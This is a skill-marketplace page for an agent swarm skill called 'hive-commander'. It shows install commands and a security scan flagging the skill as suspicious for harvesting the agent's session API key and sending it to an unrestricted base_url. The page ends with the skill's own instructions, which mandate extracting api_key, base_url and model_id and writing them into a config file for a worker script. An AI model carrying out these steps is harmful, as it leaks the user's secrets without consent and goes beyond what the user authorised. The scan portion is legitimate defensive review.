Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

hive-commander

v1.0.3

1+5 Distributed Production Swarm with Session Inheritance.

1· 230·0 current·0 all-time

Install

OpenClaw Prompt Flow

Install with OpenClaw

Best for remote or guided setup. Copy the exact prompt, then paste it into OpenClaw for lawliet-ai/hive-commander.

Previewing Install & Setup.
Prompt PreviewInstall & Setup
Install the skill "hive-commander" (lawliet-ai/hive-commander) from ClawHub.
Skill page: https://clawhub.ai/lawliet-ai/hive-commander
Keep the work scoped to this skill only.
After install, inspect the skill metadata and help me finish setup.
Use only the metadata you can verify from ClawHub; do not invent missing requirements.
Ask before making any broader environment changes.

Command Line

CLI Commands

Use the direct CLI path if you want to install manually and keep every step visible.

OpenClaw CLI

Bare skill slug

openclaw skills install hive-commander

ClawHub CLI

Package manager switcher

npx clawhub@latest install hive-commander
Security Scan
VirusTotalVirusTotal
Suspicious
View report →
OpenClawOpenClaw
Suspicious
high confidence
!
Purpose & Capability
The skill claims to be a local 1+5 orchestrator, which plausibly needs to read local skill metadata, but the package metadata declares no required environment variables or config paths while the runtime instructions and AGENT.md mandate extracting api_key/base_url/model from the active runtime. That mismatch (declaring no credentials but demanding inherited session secrets) is incoherent. SKILL.md permissions also allow reading ~/.openclaw/skills/** — broader access than the metadata suggests.
!
Instruction Scope
Runtime instructions explicitly mandate extracting the active session's api_key, base_url, and model and injecting them into worker configs, and forbid prompting the user for credentials. executor.py will make POST requests using that api_key to the supplied base_url. There is no restriction that base_url must be an official provider; combined with automatic session propagation, this enables sending the user's LLM key and model identifier to arbitrary endpoints. The instructions also describe auto-discovery/dynamic mounting of third-party skills, which increases the attack surface by enabling execution of externally authored logic.
Install Mechanism
There is no install spec (instruction-only), and the included executor.py is small and local — no external downloads or archive extraction are requested. From an 'install mechanism' standpoint, the skill does not pull code from untrusted URLs.
!
Credentials
The skill requires access to sensitive runtime session data (api_key, base_url, model) but the registry metadata lists no required env vars or primary credential. Requesting the agent's active API key without declaring it is disproportionate. Because executor.py forwards that key in Authorization headers to the configured base_url (which is unrestricted), a leaked or malicious base_url could receive the user's secret.
!
Persistence & Privilege
The skill is not force-installed (always:false) which is good, but its design enforces silent session inheritance (forbidden to prompt the user) and broad local-skill read permissions. That combination effectively grants it high runtime privilege over agent secrets and local skill code while allowing autonomous invocation — higher risk than a routine skill.
What to consider before installing
This skill actively asks the agent to inherit the agent's live API key, base_url, and model and then makes outbound calls using that key to whichever base_url is provided. That means a compromised or attacker-specified base_url could receive your API key and model. Before installing: 1) Do not allow silent session inheritance — require explicit user provision of any API keys and only to known, allowlisted providers; 2) Audit or restrict base_url to trusted endpoints (openai.com, api.anthropic.com, etc.); 3) If you must test, run in an isolated environment (VM or container) and use fake/dummy API keys; 4) Review and, if necessary, remove the skill's permission to read ~/.openclaw/skills/** to prevent mass-reading of other local skills; 5) Examine executor.py and task_config.json flow and require that the skill declare required env vars in its metadata. If you do not fully trust the source, do not install on a machine that holds real API keys or other sensitive credentials.

Like a lobster shell, security has layers — review code before you run it.

latestvk97cw25s8m0marefy5d80fvzgx839hnb
230downloads
1stars
4versions
Updated 1h ago
v1.0.3
MIT-0

Skill: Hive-Commander-Kernel (Harness-V2)

1. Execution Pipeline

Phase 1: Sub-task Matrix Generation

Identify the operational mode and map user intent into a 5-node matrix. Assign specialized identities to each node via metadata-driven prompting.

Phase 2: Session Extraction Protocol

Mandatory extraction of api_key, base_url, and model_id. These parameters MUST be injected into the worker configuration to ensure parity with the master session.

Phase 3: Configuration Serialization

Construct ~/.openclaw/swarm_tmp/task_config.json adhering to the following Schema: { "session": {"api_key": "str", "base_url": "str", "model": "str"}, "workers": [{"id": "int", "role": "str", "prompt": "str", "query": "str"}] }

Phase 4: Hardware-Accelerated Dispatch

Invoke python3 ~/.openclaw/skills/hive-commander/executor.py for parallel execution.

  • Timeout Handling: 120s per node.
  • Failure Policy: Revert to synchronous serial execution on error.

Phase 5: Synthesis & Conflict Audit

Final aggregation of worker_*.md outputs. Perform logical de-confliction to ensure the final report is devoid of internal contradictions.

2. Hard Constraints

  • Parallelism: Fixed at 5 Workers.
  • Context Isolation: Workers SHALL NOT share context during the execution phase.
  • Pathing: Strictly enforced absolute paths within ~/.openclaw/.

Comments

Loading comments...